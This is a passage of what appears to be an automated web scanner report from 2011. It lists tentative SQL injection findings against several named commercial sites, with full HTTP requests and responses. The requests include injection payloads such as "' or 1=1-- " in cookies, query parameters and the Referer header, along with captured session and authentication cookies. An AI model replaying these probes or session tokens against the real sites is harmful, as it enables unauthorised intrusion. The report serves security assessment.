Cookie: JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_USERACTIVITY_100000002776876=DEL; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; WC_SESSION_ESTABLISHED=true; CoreID6=87049420402113036145977&ci=90226925; cmTPSet=Y; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmb=242046173.7.10.1303614598; WC_AUTHENTICATION_100000002776876=DEL; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; 90226925_clogin=l=1303615928&v=33&e=1303616828151;

Response 2

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:56:47 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: JSESSIONID=0000vmnv9o8f1hYbPDSEsnh274g:14glhsrp2; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_AUTHENTICATION_100000002779947=100000002779947%2cPZvqRyizGd2TwKh4uvYxAABNDeI%3d; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_100000002779947=100000002779947%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvY0f2KZJrwddFUcpeNVAwyGbYPUti77m6QZuGMaOTaY9G7plcpovAg5AI8tQelNpkxR%0acg9iE8GDQh%2fFAN%2fo7ZGggHrAZ5zylN2TZROsW3rc3ObppT%2borsgqYZ95B2zBQaIcEt3972Ap25XX%0aPrYeGyaa; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 2080


<!-- Start of JSTLEnvironmentSetup.jspf -->


   
...[SNIP]...

1.6. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout [WC_GENERIC_ACTIVITYDATA cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/INTXEnrollSessionTimeout

Issue detail

The WC_GENERIC_ACTIVITYDATA cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the WC_GENERIC_ACTIVITYDATA cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /webapp/wcs/stores/servlet/INTXEnrollSessionTimeout HTTP/1.1
Host: secure.identityguard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_USERACTIVITY_100000002776876=DEL; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; WC_SESSION_ESTABLISHED=true; CoreID6=87049420402113036145977&ci=90226925; cmTPSet=Y; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]'; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmb=242046173.7.10.1303614598; WC_AUTHENTICATION_100000002776876=DEL; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; 90226925_clogin=l=1303615928&v=33&e=1303616828151;

Response 1

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:56:39 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000uJa67_lUOt9aqYJnR8kquHD:14glhsrp2; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 1895


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<title>Error Has Occurred</title>
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/INTXEnrollSessionTimeout HTTP/1.1
Host: secure.identityguard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_USERACTIVITY_100000002776876=DEL; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; WC_SESSION_ESTABLISHED=true; CoreID6=87049420402113036145977&ci=90226925; cmTPSet=Y; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]''; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmb=242046173.7.10.1303614598; WC_AUTHENTICATION_100000002776876=DEL; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; 90226925_clogin=l=1303615928&v=33&e=1303616828151;

Response 2

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:56:39 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: JSESSIONID=0000tQSX-8r4T5zCUYwAhnzAk4w:14glhsrp2; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_AUTHENTICATION_100000002779552=100000002779552%2cMGpFAt%2f%2fjyExX1W4q4Lgn57BZxk%3d; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_100000002779552=100000002779552%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHva%2fzzlX%2bEuJtAn3DpWKN4df6cLICQD2R8plw%2b40R5bf3lwaxFNQXiRFInsQBUaNGByC%0aGE23KSdo1zZQc%2fdYc86o%2fhfLeWmI2b3QEIv7bb522VpFlPbMgOpGTin5qndfbg9zDXy6ryUvZkjP%0a4wU1D87s; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 8623


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<!-- Start of JSTLEnvironmentSetup.jspf -->



...[SNIP]...

1.7. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXStreamlinedOfferDetails [WC_GENERIC_ACTIVITYDATA cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/INTXStreamlinedOfferDetails

Issue detail

The WC_GENERIC_ACTIVITYDATA cookie appears to be vulnerable to SQL injection attacks. The payloads 12073566'%20or%201%3d1--%20 and 12073566'%20or%201%3d2--%20 were each submitted in the WC_GENERIC_ACTIVITYDATA cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /webapp/wcs/stores/servlet/INTXStreamlinedOfferDetails HTTP/1.1
Host: secure.identityguard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_USERACTIVITY_100000002776876=DEL; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; WC_SESSION_ESTABLISHED=true; CoreID6=87049420402113036145977&ci=90226925; cmTPSet=Y; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]12073566'%20or%201%3d1--%20; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmb=242046173.7.10.1303614598; WC_AUTHENTICATION_100000002776876=DEL; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; 90226925_clogin=l=1303615928&v=33&e=1303616828151;

Response 1

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:55:48 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: JSESSIONID=0000q-nYx1Keu7bJfsO0pBizt3b:14glhsrp2; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_AUTHENTICATION_100000002779552=100000002779552%2cvn9MxBC72fZz%2bUVJP6VcyVle00I%3d; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_100000002779552=100000002779552%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHva%2fzzlX%2bEuJtAn3DpWKN4df6cLICQD2R8plw%2b40R5bf3lwaxFNQXiRFInsQBUaNGByC%0aGE23KSdo1zZQc%2fdYc86o%2fhfLeWmI2b3QEIv7bb522VpFlPbMgOpGTin5qndfbg9zDXy6ryUvZkjP%0a4wU1D87s; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Language: en-US
Content-Length: 1903














<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><head>


   <title>Error Has Occurred</title>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
   <link rel="Shortcut Icon" href="/wcsstore/IdentityGuardStorefrontAssetStore/images/favicon.ico">
   <link href="/wcsstore/IdentityGuardStorefrontAssetStore/css/checkout.css" rel="stylesheet" type="text/css">
   <script src="/wcsstore/IdentityGuardStorefrontAssetStore/javascript/jquery_002.js" type="text/javascript"></script>
   <script src="/wcsstore/IdentityGuardStorefrontAssetStore/javascript/jquery.js" type="text/javascript"></script>
   <script src="/wcsstore/IdentityGuardStorefrontAssetStore/javascript/common.js" type="text/javascript"></script>
</head><div FirebugVersion="1.3.3" style="display: none;" id="_firebugConsole"></div>
<body class="checkout">


<div id="header_wrapper">

   <div id="header">
       
   </div><!--/#header-->

</div><!--/#header_wrap
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/INTXStreamlinedOfferDetails HTTP/1.1
Host: secure.identityguard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_USERACTIVITY_100000002776876=DEL; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; WC_SESSION_ESTABLISHED=true; CoreID6=87049420402113036145977&ci=90226925; cmTPSet=Y; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]12073566'%20or%201%3d2--%20; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmb=242046173.7.10.1303614598; WC_AUTHENTICATION_100000002776876=DEL; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; 90226925_clogin=l=1303615928&v=33&e=1303616828151;

Response 2

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:55:48 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000R8n5buLhPWRVJFBeDw83q96:14glhsrp2; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 1895














<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><head>


   <title>Error Has Occurred</title>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
   <link rel="Shortcut Icon" href="/wcsstore/IdentityGuardStorefrontAssetStore/images/favicon.ico">
   <link href="/wcsstore/IdentityGuardStorefrontAssetStore/css/checkout.css" rel="stylesheet" type="text/css">
   <script src="/wcsstore/IdentityGuardStorefrontAssetStore/javascript/jquery_002.js" type="text/javascript"></script>
   <script src="/wcsstore/IdentityGuardStorefrontAssetStore/javascript/jquery.js" type="text/javascript"></script>
   <script src="/wcsstore/IdentityGuardStorefrontAssetStore/javascript/common.js" type="text/javascript"></script>
</head><div FirebugVersion="1.3.3" style="display: none;" id="_firebugConsole"></div>
<body class="checkout">


<div id="header_wrapper">

   <div id="header">
       
   </div><!--/#header-->

</div><!--/#header_wrapper-->

<div id="container_wrapper">
   <div id="container">
       <div id="content">

           <div id="error_page">
               <h2 class="step">Error</h2>
               <p><strong>We're sorry, an error has occured.</strong> Please try again later or call Customer Service toll-free at 1-800-452-2541.</p>
               <p class="continue"><a href="http://www.identityguard.com/"><img src="/wcsstore/IdentityGuardStorefrontAssetStore/images/continue.gif" alt="Continue"></a></p>
           </div>

       </div><!--/#content-->
       
       <div id="sidebar">
           &nbsp;
       </div><!--/#sidebar-->
       
       <div class="clear">&nbsp;</div>
       
   </div><!--/#conainer-->
</div><!--/#container_wrapper-->

<div id="footer_wra
...[SNIP]...

1.8. http://www.freecreditscore.com/dni/default.aspx [PageTypeID parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.freecreditscore.com
Path:   /dni/default.aspx

Issue detail

The PageTypeID parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PageTypeID parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /dni/default.aspx?PageTypeID=HomePage21'&SiteVersionID=932&SiteID=100323&sc=671212&bcd= HTTP/1.1
Host: www.freecreditscore.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MachineName=IRC-P2WEB-07; OriginalReferrer=; NavigationPath=default; LastVisitDate=4/24/2011 12:44:36 PM; NavFlowID=; NumTrialDaysLeft=; UID=dfa29d439e60422e86d8462241524cd1; ASP.NET_SessionId=z5w0c1552jmahb45v4wnxt3b; BIGipServerfreecreditscore-web-pool=174804490.19999.0000

Response 1

HTTP/1.1 302 Found
Connection: keep-alive
Date: Sun, 24 Apr 2011 19:56:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /dni/Error.html?aspxerrorpath=/dni/default.aspx
Set-Cookie: NavigationPath=default+s_code.axd+default; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: LastVisitDate=4/24/2011 12:56:18 PM; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Content-Type: text/html; charset=utf-8
Content-Length: 164
Cache-Control: private
X-PvInfo: [S10203.C70872.A70594.RA0.G11457.U10300F0D].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/dni/Error.html?aspxerrorpath=/dni/default.aspx'>here</a>.</h2>
</body></html>

Request 2

GET /dni/default.aspx?PageTypeID=HomePage21''&SiteVersionID=932&SiteID=100323&sc=671212&bcd= HTTP/1.1
Host: www.freecreditscore.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MachineName=IRC-P2WEB-07; OriginalReferrer=; NavigationPath=default; LastVisitDate=4/24/2011 12:44:36 PM; NavFlowID=; NumTrialDaysLeft=; UID=dfa29d439e60422e86d8462241524cd1; ASP.NET_SessionId=z5w0c1552jmahb45v4wnxt3b; BIGipServerfreecreditscore-web-pool=174804490.19999.0000

Response 2

HTTP/1.1 302 Found
Connection: keep-alive
Date: Sun, 24 Apr 2011 19:56:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /dni/default.aspx?PageTypeID=HomePage21&SiteVersionID=932&SiteID=100323&sc=671212&bcd=
Set-Cookie: NavigationPath=default+s_code.axd+default; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: LastVisitDate=4/24/2011 12:56:20 PM; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Content-Type: text/html; charset=utf-8
Content-Length: 219
Cache-Control: private
X-PvInfo: [S10203.C70872.A70594.RA0.G11457.U90815149].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/dni/default.aspx?PageTypeID=HomePage21&amp;SiteVersionID=932&amp;SiteID=100323&amp;sc=671212&amp;bcd='>here</a>.</h2
...[SNIP]...

1.9. http://www.hotelclub.com/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotelclub.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.hotelclub.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
ntCoent-Length: 15330
Content-Type: text/html; Charset=windows-1252
Expires: Sun, 24 Apr 2011 13:12:24 GMT
Cache-Control: private
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 13:13:25 GMT
Connection: close
Set-Cookie: anon=47837466001520110424230132; expires=Sun, 31-Dec-2034 13:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCQRQCTQ=EJPPCPBAEFOGKJENLHANBPKN; path=/
Set-Cookie: NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273245525d5f4f58455e445a4a422974;path=/;httponly
Content-Length: 15330


<html>
<head>


<title>Under Maintenance</title>
<meta name=robots content=noindex,nofollow>
<meta name='DCSext.er' content="500;100"/>


<link rel="stylesheet" id="main-css" href="/Pri
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.hotelclub.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Cteonnt-Length: 232749
Content-Type: text/html; Charset=windows-1252
Expires: Sat, 23 Apr 2011 13:13:26 GMT
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 13:13:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: HTC=AppVer=1%2E0; path=/
Set-Cookie: AffiliateLogID=%2D1963682291; expires=Mon, 23-May-2011 14:00:00 GMT; path=/
Set-Cookie: anon=58210390806120110424230132; expires=Sun, 31-Dec-2034 13:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDQSSAQDRQ=GADPBCECLCOALKJPEFJPNLOE; path=/
Set-Cookie: NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273c45525d5f4f58455e445a4a422974;path=/;httponly
Content-Length: 232749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

1.10. http://www.nextadvisor.com/link.php [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nextadvisor.com
Path:   /link.php

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /link.php?kw=gid9a%20identity%20theft%20resource_ordering34&category=identitytheft&link=idtheftshield&id=227 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
